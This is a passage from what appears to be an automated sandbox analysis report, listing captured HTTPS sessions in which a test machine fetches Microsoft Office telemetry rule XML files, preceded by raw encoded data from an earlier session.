                                                                                                                                                                                                                                                                                                            Data Ascii: 446clP9S92QkTTXcEACJ4xEAbxKT0mHhVqZo9qUIAWJDR2Dv3STVXhBhF691IrOXY3UKPrGzBcNswAma1m0tQDUqQq6ZM5sXQWEXuWgis7hqIgp8sehDhDzECZrHaWoNMysD/JM1nwFHKVSwfWXshnBqAXv+ugzDeoQNjIcyIy8mMwHZniGcRllhTv51bqvZM2EKcP+0BYo+zgCSxmxrEiohCPydNp4LTj1Zunpu6oxwIkMw9qhD23SXOJfWe
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 57 6b 45 4c 43 67 45 39 70 31 77 32 30 5a 42 4e 78 66 6d 4d 6b 48 75 6b 58 52 75 47 7a 4c 4c 38 42 7a 4e 4c 59 51 4e 6d 49 63 79 49 77 67 6b 4a 67 48 39 6b 6a 4f 64 44 56 51 76 52 62 68 2f 5a 2f 6d 48 64 6d 77 48 63 2b 4f 36 44 59 55 33 7a 51 47 64 77 6d 31 6e 51 47 39 6c 42 65 37 64 61 4e 55 6e 53 79 52 62 74 47 56 69 71 35 34 39 65 30 31 33 2f 66 42 62 77 7a 44 46 44 70 58 44 5a 47 30 45 4c 53 4d 4d 2b 35 49 32 6e 77 5a 42 4a 56 2b 32 63 32 2f 67 6a 6e 4e 6e 41 48 54 33 76 41 4b 47 64 49 70 4b 6b 39 38 71 4f 30 41 50 49 67 48 6b 33 77 57 57 43 45 67 6f 51 66 35 74 4c 50 4c 42 64 47 35 4e 4b 4c 47 2b 42 6f 77 6d 78 52 69 52 79 58 68 76 42 53 63 6f 41 66 69 64 4e 5a 49 4c 53 43 6c 51 76 58 70 6d 36 6f 39 2f 61 41 35 30 38 76 42 4e 77 7a 50 63 53 73 79 48
                                                                                                                                                                                                                                                                                                            Data Ascii: WkELCgE9p1w20ZBNxfmMkHukXRuGzLL8BzNLYQNmIcyIwgkJgH9kjOdDVQvRbh/Z/mHdmwHc+O6DYU3zQGdwm1nQG9lBe7daNUnSyRbtGViq549e013/fBbwzDFDpXDZG0ELSMM+5I2nwZBJV+2c2/gjnNnAHT3vAKGdIpKk98qO0APIgHk3wWWCEgoQf5tLPLBdG5NKLG+BowmxRiRyXhvBScoAfidNZILSClQvXpm6o9/aA508vBNwzPcSsyH
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 59 6d 44 2f 47 58 50 70 49 43 53 69 5a 61 75 48 4a 6c 37 34 52 68 5a 77 52 38 2f 66 42 4e 77 7a 50 63 53 73 79 48 52 57 51 57 49 67 6f 42 35 35 52 77 69 6b 68 66 62 31 43 79 4d 6a 71 72 68 6e 5a 71 42 6e 62 35 73 42 47 47 4f 73 38 4c 6e 73 46 72 62 67 77 6e 4a 51 50 32 6d 7a 79 56 41 55 45 39 52 62 74 30 63 4f 48 42 50 53 49 4b 61 4c 48 6f 51 37 55 6b 30 78 75 43 68 56 39 67 44 69 38 69 46 4c 61 43 66 6f 78 47 51 53 4d 58 35 6a 4a 70 36 34 31 30 61 67 74 30 2b 62 38 4d 69 69 62 46 42 70 72 56 62 57 4d 4a 4c 79 6f 4f 2f 35 41 33 6d 41 31 4d 49 6c 4f 35 63 79 4b 6c 77 58 52 36 54 53 69 78 68 68 4f 4f 4f 4f 6f 42 6d 4d 34 71 66 45 34 34 5a 51 58 36 33 57 6a 56 41 6b 6f 6e 58 62 46 37 61 4f 47 4f 65 6d 49 46 65 66 69 7a 41 34 38 79 78 51 61 59 79 6d 39 67 42
                                                                                                                                                                                                                                                                                                            Data Ascii: YmD/GXPpICSiZauHJl74RhZwR8/fBNwzPcSsyHRWQWIgoB55Rwikhfb1CyMjqrhnZqBnb5sBGGOs8LnsFrbgwnJQP2mzyVAUE9Rbt0cOHBPSIKaLHoQ7Uk0xuChV9gDi8iFLaCfoxGQSMX5jJp6410agt0+b8MiibFBprVbWMJLyoO/5A3mA1MIlO5cyKlwXR6TSixhhOOOOoBmM4qfE44ZQX63WjVAkonXbF7aOGOemIFefizA48yxQaYym9gB
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 70 30 79 6e 56 41 55 70 76 44 2f 35 2b 59 65 65 4a 66 47 51 45 66 50 75 35 43 49 38 2f 77 41 61 64 77 6d 78 69 42 53 51 6b 42 76 71 58 4e 70 59 46 53 53 42 59 74 6a 49 73 71 34 5a 72 49 6c 55 77 31 4b 63 49 6a 54 4b 45 46 64 72 65 4b 6d 51 4d 59 58 31 43 2b 70 51 32 6b 77 4e 4b 4c 6c 47 32 64 32 72 76 67 48 56 6b 44 6e 2f 31 74 51 4b 4d 4d 4d 67 45 6e 73 5a 72 62 77 73 75 4c 67 65 32 30 33 43 53 48 67 5a 33 46 34 39 78 64 50 79 52 66 79 49 53 50 75 6a 77 42 49 39 30 6e 45 71 56 31 57 42 70 44 69 51 71 42 2f 57 53 4e 35 67 41 53 69 56 65 74 6e 52 74 34 70 4e 77 62 67 4e 33 2f 37 77 4e 6a 6a 37 48 42 39 53 4a 4b 6d 51 59 59 58 31 43 32 70 6f 39 75 77 31 4b 4b 42 65 68 50 48 75 72 68 6e 38 69 56 54 44 39 75 67 2b 4b 4e 4d 30 50 6e 4d 78 6a 5a 67 45 71 49 41
                                                                                                                                                                                                                                                                                                            Data Ascii: p0ynVAUpvD/5+YeeJfGQEfPu5CI8/wAadwmxiBSQkBvqXNpYFSSBYtjIsq4ZrIlUw1KcIjTKEFdreKmQMYX1C+pQ2kwNKLlG2d2rvgHVkDn/1tQKMMMgEnsZrbwsuLge203CSHgZ3F49xdPyRfyISPujwBI90nEqV1WBpDiQqB/WSN5gASiVetnRt4pNwbgN3/7wNjj7HB9SJKmQYYX1C2po9uw1KKBehPHurhn8iVTD9ug+KNM0PnMxjZgEqIA
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 6a 45 5a 42 49 78 66 6d 4d 6d 54 6b 69 48 42 74 44 48 6e 39 76 51 61 4b 4d 63 55 4d 6b 4d 31 67 59 77 59 6e 4a 41 66 38 6e 6a 47 66 44 30 45 6e 55 4c 31 67 49 71 58 42 64 48 70 4e 4b 4c 47 5a 42 4a 45 36 31 45 71 4c 69 58 4d 6a 42 79 31 6c 57 72 61 5a 4f 70 6f 43 51 53 4e 52 75 33 52 76 36 6f 35 79 59 67 4a 30 2b 72 6b 46 67 6a 6e 42 42 35 44 56 59 47 67 50 4c 53 77 4f 2b 39 31 2b 31 51 46 65 62 77 2f 2b 51 32 2f 6c 6a 33 52 30 54 57 2b 2f 71 55 4f 45 4f 49 52 53 31 4d 5a 6d 62 41 4d 75 4a 67 48 33 6c 79 4b 48 43 6b 38 6e 55 72 4a 35 62 4f 32 54 64 57 30 45 63 2f 4b 35 42 49 73 34 7a 67 6d 54 68 79 51 6a 42 7a 6c 6c 57 72 61 2b 4a 34 55 4c 42 6a 41 5a 70 7a 4a 6c 35 38 45 72 49 67 56 39 2b 62 6f 48 68 44 6e 44 44 4a 33 56 59 32 59 4f 49 53 45 4a 2b 5a 73
                                                                                                                                                                                                                                                                                                            Data Ascii: jEZBIxfmMmTkiHBtDHn9vQaKMcUMkM1gYwYnJAf8njGfD0EnUL1gIqXBdHpNKLGZBJE61EqLiXMjBy1lWraZOpoCQSNRu3Rv6o5yYgJ0+rkFgjnBB5DVYGgPLSwO+91+1QFebw/+Q2/lj3R0TW+/qUOEOIRS1MZmbAMuJgH3lyKHCk8nUrJ5bO2TdW0Ec/K5BIs4zgmThyQjBzllWra+J4ULBjAZpzJl58ErIgV9+boHhDnDDJ3VY2YOISEJ+Zs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 69 5a 5a 74 33 30 69 70 63 46 30 65 6b 30 6f 73 5a 45 59 67 44 6a 4a 53 6f 75 4a 63 79 4d 48 4c 57 56 61 74 70 45 2b 6b 41 5a 4d 4b 56 4f 37 64 47 6a 75 67 58 68 68 41 6e 54 33 74 41 79 44 50 38 30 4c 6b 73 4a 67 61 41 59 73 4a 67 54 77 33 58 37 56 41 56 35 76 44 2f 35 53 65 65 61 4e 64 43 49 53 50 75 6a 77 42 49 39 30 6e 45 71 66 79 32 35 6b 41 43 77 6d 43 76 4f 5a 4f 70 41 47 54 6a 31 66 76 6e 56 77 2b 59 46 36 5a 77 46 7a 38 62 51 46 69 6a 4c 48 44 74 53 4a 4b 6d 51 59 59 58 31 43 32 35 45 33 76 41 46 64 62 30 6a 77 61 79 4c 73 6a 54 4d 36 54 58 48 36 75 67 79 4f 4e 38 49 4a 6e 38 4a 67 59 67 63 70 4b 42 44 31 6b 6a 2b 52 42 6b 6b 70 55 62 39 39 5a 4f 79 49 63 6d 6f 4b 4d 4c 2f 77 42 4a 74 30 6e 45 71 36 77 47 6c 6e 51 44 35 72 47 37 61 61 50 4e 56 65
                                                                                                                                                                                                                                                                                                            Data Ascii: iZZt30ipcF0ek0osZEYgDjJSouJcyMHLWVatpE+kAZMKVO7dGjugXhhAnT3tAyDP80LksJgaAYsJgTw3X7VAV5vD/5SeeaNdCISPujwBI90nEqfy25kACwmCvOZOpAGTj1fvnVw+YF6ZwFz8bQFijLHDtSJKmQYYX1C25E3vAFdb0jwayLsjTM6TXH6ugyON8IJn8JgYgcpKBD1kj+RBkkpUb99ZOyIcmoKML/wBJt0nEq6wGlnQD5rG7aaPNVe
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 68 2f 63 75 7a 42 54 43 78 4e 61 4c 48 6f 51 37 59 33 79 67 53 54 30 58 73 75 4a 7a 63 76 42 65 61 61 4a 35 70 47 43 47 39 52 2f 69 6f 78 70 63 46 33 63 30 30 6f 6f 65 4a 59 31 6d 65 54 57 73 62 59 4a 48 70 41 4e 32 56 61 70 4e 4e 77 68 30 59 65 62 78 43 39 59 48 44 74 67 6d 56 68 53 6b 37 50 6c 78 6d 4f 4d 74 4d 62 71 76 6c 74 65 51 30 6e 4d 68 4f 36 69 44 4f 62 43 45 45 35 46 2f 41 79 62 61 76 5a 53 69 4a 46 4d 4d 37 2b 51 35 74 30 6e 45 71 68 78 47 52 74 42 7a 63 30 54 39 47 48 50 5a 4d 52 56 32 38 5a 2f 6e 51 69 73 39 45 39 49 67 6c 68 73 65 68 54 30 57 2b 52 57 63 4f 58 4f 48 78 4f 4f 47 55 55 74 73 56 69 32 30 5a 55 62 77 2f 2b 4e 57 48 35 6b 33 56 68 47 33 4f 32 6a 6a 32 74 4d 38 49 50 6b 39 63 6f 54 51 73 31 49 6b 4b 34 33 54 2f 56 58 6e 39 76 48
                                                                                                                                                                                                                                                                                                            Data Ascii: h/cuzBTCxNaLHoQ7Y3ygST0XsuJzcvBeaaJ5pGCG9R/ioxpcF3c00ooeJY1meTWsbYJHpAN2VapNNwh0YebxC9YHDtgmVhSk7PlxmOMtMbqvlteQ0nMhO6iDObCEE5F/AybavZSiJFMM7+Q5t0nEqhxGRtBzc0T9GHPZMRV28Z/nQis9E9IglhsehT0W+RWcOXOHxOOGUUtsVi20ZUbw/+NWH5k3VhG3O2jj2tM8IPk9coTQs1IkK43T/VXn9vH
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 72 32 53 45 73 54 58 54 67 38 46 76 54 5a 70 39 66 78 35 41 36 4d 52 39 76 50 45 4c 67 33 57 6a 48 53 41 59 39 46 2b 59 79 4a 65 69 54 59 57 51 4f 5a 76 4c 33 50 62 30 54 79 67 32 56 30 58 70 30 44 32 34 4c 4e 4e 65 6a 44 6f 41 46 53 43 46 51 71 47 4d 69 70 63 46 38 49 6c 56 4a 73 66 68 44 76 48 71 45 45 74 53 66 4b 6c 59 44 4c 79 73 46 34 49 78 39 73 67 68 42 4c 6b 47 75 5a 57 32 6b 72 30 56 44 54 54 36 78 74 6b 50 62 5a 6f 70 4b 6b 4e 59 71 4f 31 42 7a 66 6c 65 6c 79 6d 44 48 47 51 67 32 46 36 67 79 4f 72 6e 50 4d 33 42 4e 4b 4c 48 33 41 4a 45 6d 77 67 6d 43 78 43 31 64 50 67 59 72 42 66 65 4c 49 4a 67 4b 5a 79 78 47 74 45 78 63 2f 6f 4a 39 62 41 70 6d 34 50 42 4e 77 7a 75 45 55 71 32 48 49 69 4d 2f 62 32 55 61 74 73 56 77 6f 41 56 49 49 56 43 6f 59 79
                                                                                                                                                                                                                                                                                                            Data Ascii: r2SEsTXTg8FvTZp9fx5A6MR9vPELg3WjHSAY9F+YyJeiTYWQOZvL3Pb0Tyg2V0Xp0D24LNNejDoAFSCFQqGMipcF8IlVJsfhDvHqEEtSfKlYDLysF4Ix9sghBLkGuZW2kr0VDTT6xtkPbZopKkNYqO1BzflelymDHGQg2F6gyOrnPM3BNKLH3AJEmwgmCxC1dPgYrBfeLIJgKZyxGtExc/oJ9bApm4PBNwzuEUq2HIiM/b2UatsVwoAVIIVCoYy
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1369INData Raw: 5a 52 30 79 31 37 4d 56 67 48 53 4b 53 6f 79 48 4d 69 4d 74 4d 79 49 53 39 64 38 63 6b 67 74 4b 62 30 6a 77 61 79 4c 39 77 53 73 78 51 7a 44 6a 38 46 76 44 63 38 63 59 68 73 46 70 64 51 4e 6d 47 7a 7a 62 6a 7a 65 46 42 51 51 65 57 72 70 6b 64 2b 69 52 64 46 77 7a 58 65 4f 33 45 34 42 32 34 54 44 57 39 6e 78 67 41 43 38 69 51 72 6a 64 4b 4e 56 65 42 67 4a 46 75 57 4a 68 71 61 52 4a 49 44 78 6d 38 72 41 4e 68 48 54 62 52 49 32 48 66 43 4e 59 63 6d 74 43 35 4e 31 6f 31 55 46 49 49 6c 61 39 66 47 48 35 6b 33 56 68 47 33 4f 32 6a 6a 32 73 50 38 55 61 6d 64 5a 6e 5a 78 59 66 47 79 58 77 6d 44 65 72 4f 48 45 2b 55 4b 34 77 52 4f 69 58 63 43 4a 44 4d 4f 6e 77 57 38 4d 54 77 67 2b 54 68 79 51 6a 42 47 46 39 51 74 6d 57 4d 59 55 4c 56 79 4a 54 71 44 42 46 37 59 52
                                                                                                                                                                                                                                                                                                            Data Ascii: ZR0y17MVgHSKSoyHMiMtMyIS9d8ckgtKb0jwayL9wSsxQzDj8FvDc8cYhsFpdQNmGzzbjzeFBQQeWrpkd+iRdFwzXeO3E4B24TDW9nxgAC8iQrjdKNVeBgJFuWJhqaRJIDxm8rANhHTbRI2HfCNYcmtC5N1o1UFIIla9fGH5k3VhG3O2jj2sP8UamdZnZxYfGyXwmDerOHE+UK4wROiXcCJDMOnwW8MTwg+ThyQjBGF9QtmWMYULVyJTqDBF7YR


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            124192.168.2.44987113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:50 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 7bd1ae59-401e-008c-598c-3a86c2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111050Z-178bfbc474brk967hC1NYCfu60000000011g00000000fkbs
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            125192.168.2.44987313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:50 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: b2a27076-001e-0017-47b7-3b0c3c000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111050Z-r1d97b99577ndm4rhC1TEBf0ps0000000ad0000000006031
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            126192.168.2.44987213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:50 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:50 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111050Z-178bfbc474b9xljthC1NYCtw94000000018g000000009a4t
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:51 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            127192.168.2.44987813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:52 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 852b0afa-d01e-00a1-0e9b-3b35b1000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111052Z-1777c6cb754gc8g6hC1TEB966c0000000awg00000000g77k
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            128192.168.2.44987913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:52 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
